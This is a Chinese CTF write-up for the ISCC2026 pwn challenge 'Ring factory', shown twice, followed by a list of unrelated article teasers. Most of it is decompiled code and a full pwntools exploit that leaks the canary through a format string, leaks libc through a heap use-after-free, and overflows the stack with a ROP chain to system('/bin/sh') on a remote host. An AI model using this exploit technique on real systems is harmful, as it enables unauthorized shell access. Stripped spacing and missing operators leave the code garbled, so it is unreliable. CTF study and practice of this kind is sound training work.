题目分析保护全开这里格式化漏洞可以泄露canarypie地址libc地址void__noreturnmenu(){intid;// eaxchars[4];// [rsp4h] [rbp-Ch] BYREFunsigned__int64 v2;// [rsp8h] [rbp-8h]v2__readfsqword(0x28u);while(1){cls();puts(\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n);puts(Welcome to my secret sling ring factory.);puts(What do you want to do today?\n);puts(1. Show Forged Rings);puts(2. Forge Sling Ring);puts(3. Discard Sling Ring);puts(4. Use Sling Ring);printf( );fgets(s,4,stdin);fflush(stdin);putchar(10);idatoi(s);if(id4){use_slingring();exit(0);}if(id4){LABEL_12:puts(Invalid input!);puts(Press ENTER to go back...);getchar();}else{switch(id){case3:discard_slingring();break;case1:show_slingrings();break;case2:forge_slingring();break;default:gotoLABEL_12;}}}}menu这里是个菜单应该就是一个堆利用菜单题show()函数是打印所有chunk内容同时discard函数里free完没有指针归NULL有UAF所以可以打印free chunk的内容intuse_slingring(){chars[4];// [rspCh] [rbp-44h] BYREFchars_1[56];// [rsp10h] [rbp-40h] BYREFunsigned__int64 v3;// [rsp48h] [rbp-8h]v3__readfsqword(0x28u);printf(Which ring would you like to use (id): );fgets(s,4,stdin);fflush(stdin);atoi(s);printf(\nPlease enter the spell: );fgets(s_1,256,stdin);puts(\nThank you for visiting our factory! We will now transport you.);returnputs(\nTransporting...);}这里还有个栈溢出所以这道题就是利用格式化字符串来泄露canary利用堆来泄露libc然后栈溢出拿shell还是非常简单的。Poc构造先用%7$p来泄露canary然后构造poc由于是glibc2.31有tcache需要先填满7个tcache然后才能用fastbin所以分配八个释放八个注意还要跟top隔断然后show即可泄露libc后面直接栈溢出就行expfrompwnimport*importsys exeELF(./pwn2_patched)libcELF(./libc-2.31.so)ldELF(./ld-2.31.so)context.binaryexe context.log_leveldebuglocal0iflocal:pprocess(./pwn2_patched)#gdb.attach(p)else:premote(39.96.193.120,10006)defforge(id,des,amount):p.sendlineafter(b ,b2)p.sendlineafter(brings!,str(id).encode())p.sendlineafter(blocation:,des)p.sendlineafter(b(1-9):,str(amount).encode())defshow():p.sendlineafter(b ,b1)defdiscard(id):p.sendlineafter(b ,b3)p.sendlineafter(bdiscard?,str(id).encode())p.recvuntil(bWhat is your name?)p.sendline(b%7$p)p.recvuntil(b0x)canaryint(p.recv(16),16)log.info(fcanary {hex(canary)})foriinrange(10):forge(i,b1,1)p.sendline()foriinrange(9):discard(i)show()p.recvuntil(bRing Slot #7 | [144] | )leaku64(p.recv(6).ljust(8,b\x00))print(fleak {hex(leak)})libc_baseleak-0x1ECBE0log.info(flibc_base {hex(libc_base)})system_addrlibc_baselibc.sym[system]bin_sh_addrlibc_basenext(libc.search(/bin/sh))pop_rdi_addrlibc_base0x0000000000023b6aret_addrlibc_base0x0000000000022679p.sendline()p.sendlineafter(b ,b4)p.sendlineafter(bWhich ring would you like to use (id): ,b6)payloadba*0x38p64(canary)p64(0)p64(ret_addr)p64(pop_rdi_addr)p64(bin_sh_addr)p64(system_addr)p.sendlineafter(bPlease enter the spell: ,payload)p.interactive()
ISCC2026 pwn Ring factory
发布时间:2026/5/22 6:47:08
题目分析保护全开这里格式化漏洞可以泄露canarypie地址libc地址void__noreturnmenu(){intid;// eaxchars[4];// [rsp4h] [rbp-Ch] BYREFunsigned__int64 v2;// [rsp8h] [rbp-8h]v2__readfsqword(0x28u);while(1){cls();puts(\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n);puts(Welcome to my secret sling ring factory.);puts(What do you want to do today?\n);puts(1. Show Forged Rings);puts(2. Forge Sling Ring);puts(3. Discard Sling Ring);puts(4. Use Sling Ring);printf( );fgets(s,4,stdin);fflush(stdin);putchar(10);idatoi(s);if(id4){use_slingring();exit(0);}if(id4){LABEL_12:puts(Invalid input!);puts(Press ENTER to go back...);getchar();}else{switch(id){case3:discard_slingring();break;case1:show_slingrings();break;case2:forge_slingring();break;default:gotoLABEL_12;}}}}menu这里是个菜单应该就是一个堆利用菜单题show()函数是打印所有chunk内容同时discard函数里free完没有指针归NULL有UAF所以可以打印free chunk的内容intuse_slingring(){chars[4];// [rspCh] [rbp-44h] BYREFchars_1[56];// [rsp10h] [rbp-40h] BYREFunsigned__int64 v3;// [rsp48h] [rbp-8h]v3__readfsqword(0x28u);printf(Which ring would you like to use (id): );fgets(s,4,stdin);fflush(stdin);atoi(s);printf(\nPlease enter the spell: );fgets(s_1,256,stdin);puts(\nThank you for visiting our factory! We will now transport you.);returnputs(\nTransporting...);}这里还有个栈溢出所以这道题就是利用格式化字符串来泄露canary利用堆来泄露libc然后栈溢出拿shell还是非常简单的。Poc构造先用%7$p来泄露canary然后构造poc由于是glibc2.31有tcache需要先填满7个tcache然后才能用fastbin所以分配八个释放八个注意还要跟top隔断然后show即可泄露libc后面直接栈溢出就行expfrompwnimport*importsys exeELF(./pwn2_patched)libcELF(./libc-2.31.so)ldELF(./ld-2.31.so)context.binaryexe context.log_leveldebuglocal0iflocal:pprocess(./pwn2_patched)#gdb.attach(p)else:premote(39.96.193.120,10006)defforge(id,des,amount):p.sendlineafter(b ,b2)p.sendlineafter(brings!,str(id).encode())p.sendlineafter(blocation:,des)p.sendlineafter(b(1-9):,str(amount).encode())defshow():p.sendlineafter(b ,b1)defdiscard(id):p.sendlineafter(b ,b3)p.sendlineafter(bdiscard?,str(id).encode())p.recvuntil(bWhat is your name?)p.sendline(b%7$p)p.recvuntil(b0x)canaryint(p.recv(16),16)log.info(fcanary {hex(canary)})foriinrange(10):forge(i,b1,1)p.sendline()foriinrange(9):discard(i)show()p.recvuntil(bRing Slot #7 | [144] | )leaku64(p.recv(6).ljust(8,b\x00))print(fleak {hex(leak)})libc_baseleak-0x1ECBE0log.info(flibc_base {hex(libc_base)})system_addrlibc_baselibc.sym[system]bin_sh_addrlibc_basenext(libc.search(/bin/sh))pop_rdi_addrlibc_base0x0000000000023b6aret_addrlibc_base0x0000000000022679p.sendline()p.sendlineafter(b ,b4)p.sendlineafter(bWhich ring would you like to use (id): ,b6)payloadba*0x38p64(canary)p64(0)p64(ret_addr)p64(pop_rdi_addr)p64(bin_sh_addr)p64(system_addr)p.sendlineafter(bPlease enter the spell: ,payload)p.interactive()
相关文章
GBase 8a数据库索引机制详解-行存与列存索引原理差异
很多从行存数据库迁移过来的 DBA,习惯性地在 GBase 8a 建索引、靠索引来加速查询,却发现收效甚微甚至完全没有效果。这是因为列存引擎的数据访问模式与行存引擎根本不同,索引在列存环境下的角色和价值需要重新理解。本文从列存的物理存储结构…
2026年最佳手机阅读器推荐:付费也值得的精品选择
在数字时代,阅读方式正在发生深刻变革。随着电子书、在线文章和多媒体内容的兴起,人们越来越倾向于通过智能手机进行阅读。然而,并非所有的阅读器都能提供优质的阅读体验。今天,我们将聚焦于一款即便付费也绝对物超所值的手机阅读…
微信机器人二次开发框架
WTAPI框架wechat ipad协议 📱 WTAPI 微信机器人API接口开发平台 WTAPI是一套面向开发者的微信自动化执行基础设施。 通过WTAPI,开发者可以使用标准API控制微信完成各类操作,包括消息发送、好友管理、群管理、朋友圈等,无需处理…
在 Elasticsearch 中,存储向量查询速度最高提升 3 倍
作者:来自 Elastic Benjamin Trent Elasticsearch 9.4 提供了一种更简单的方式来搜索存储在 Elasticsearch 索引中的向量,并将延迟最高降低 3 倍。 从向量搜索到强大的 REST API,Elasticsearch 为开发者提供了最全面的搜索工具集。深入体验 E…
yudao-cloud云原生权限安全深度剖析:OAuth2、JWT与Nacos风险实战
1. 这不是一次“走流程”的渗透测试,而是一次对云原生权限模型的实战压力测试“yudao-cloud渗透测试:安全风险发现与修复”——这个标题里藏着三个关键信号:yudao-cloud是一个真实落地的、基于 Spring Cloud Alibaba 的国产开源微服务管理平台…
LangGraph 与 LangChain 集成:复用Chain组件的5个实操步骤
LangGraph 与 LangChain 集成:复用Chain组件的5个实操步骤 1. 引入与连接 1.1 一个AI开发者的困境 想象一下这个场景:你是一名AI应用开发者,过去几个月里,你使用LangChain构建了一个出色的文档问答系统。它包括多个精心设计的Chain组件:一个用于文档加载和分块,一个用…
Burp Suite AI增强:本地化轻量模型实现请求意图识别与敏感数据定位
1. 这不是“加个插件就变AI”,而是重构Burp的分析范式你有没有过这样的时刻:凌晨两点,盯着Burp Suite里滚动的2000条HTTP请求发呆——其中97%是静态资源、心跳包、埋点上报;真正需要人工研判的API接口可能就3条,但它们…
Frida在金融App加密通信安全验证中的实战应用
1. 这不是“破解”,而是金融App通信安全的合规性验证实践我第一次在某股份制银行的移动App里抓到那段base64编码、密钥动态生成、TLS握手前就完成加解密的HTTP Body时,手是抖的。不是因为兴奋,而是因为后怕——当时我们团队刚接手该行App的渗…
Tomcat DefaultServlet MIME类型处理缺陷导致信息泄露
1. 这个漏洞不是“能读文件”那么简单,而是Tomcat在特定配置下主动把不该暴露的内部状态当HTTP响应发出去了CVE-2024-21733这个编号刚出来时,我第一反应是又一个“目录遍历”或“文件读取”类的老套路。但真正花半天时间搭环境复现、抓包分析、翻Tomcat源…
单日大涨4.52%!华泰柏瑞中韩半导体ETF(513310.SH)上演“高热度”行情,溢价率风险引关注
5月21日,华泰柏瑞中韩半导体ETF(513310.SH)延续强势表现,当日收盘价报5.625元,涨幅达4.52%,盘中交投异常活跃,换手率109.80%,量比为1.32,市场资金交易热情高涨。然而&…
11. 架构:前端工程化与状态管理实战
写在前面: 如果说后端 MVT 引擎是 GIS 系统的“心脏”,那么前端就是它的“大脑”和“面孔”。在现代 WebGIS 开发中,如何优雅地管理复杂的图层状态、如何处理海量瓦片的渲染逻辑,是决定项目成败的关键。 今天,我们将深入 light-mvt-server 的前端核心,看看如何利用 Vite …
淘金币自动化脚本终极指南:10分钟搞定淘宝日常任务,每天为你节省20分钟
淘金币自动化脚本终极指南:10分钟搞定淘宝日常任务,每天为你节省20分钟 【免费下载链接】taojinbi 淘宝淘金币自动执行脚本,包含蚂蚁森林收取能量,芭芭农场全任务,解放你的双手 项目地址: https://gitcode.com/gh_mi…
【实用小程序】超轻量级文件上传下载中心 (File Download Server)
站内源码及jar包下载 一、项目概述 文件下载中心一个基于 Java 内置 HTTP 服务器(com.sun.net.httpserver)构建的轻量级文件管理服务。它零第三方依赖,单 JAR 包即可运行,适合在内网环境或临时场景中快速搭建文件共享站点。 你的团队需要临时共享一批日志文件或交付物,…
py每日spider案例之某website之xin东方选课搜索接口(难度一般 扣取代码即可)
加密位置: 逆向接口参数: 逆向接口: const g = globalThis; g.window = g; g.self = g; g.location = {<
终极轻量级Android文本编辑器Markor:多格式笔记应用完全指南
终极轻量级Android文本编辑器Markor:多格式笔记应用完全指南 【免费下载链接】markor Text editor - Notes & ToDo (for Android) - Markdown, todo.txt, plaintext, math, .. 项目地址: https://gitcode.com/gh_mirrors/ma/markor 在移动设备上寻找一款…
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案
MPC-BE:基于DirectShow架构的专业级开源媒体播放解决方案 【免费下载链接】MPC-BE MPC-BE – универсальный проигрыватель аудио и видеофайлов для операционной системы Windows. 项目地址:…
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南
如何快速计算3D模型体积和重量:STL-Volume-Model-Calculator终极指南 【免费下载链接】STL-Volume-Model-Calculator STL Volume Model Calculator Python 项目地址: https://gitcode.com/gh_mirrors/st/STL-Volume-Model-Calculator 你是否曾经为3D打印项目…
通过Taotoken CLI工具一键配置团队开发环境与模型密钥
通过Taotoken CLI工具一键配置团队开发环境与模型密钥 1. CLI工具安装与基本使用 Taotoken提供的CLI工具可通过npm全局安装或直接使用npx运行。对于需要频繁使用CLI的团队,推荐全局安装: npm install -g taotoken/taotoken对于临时使用或项目级配置&a…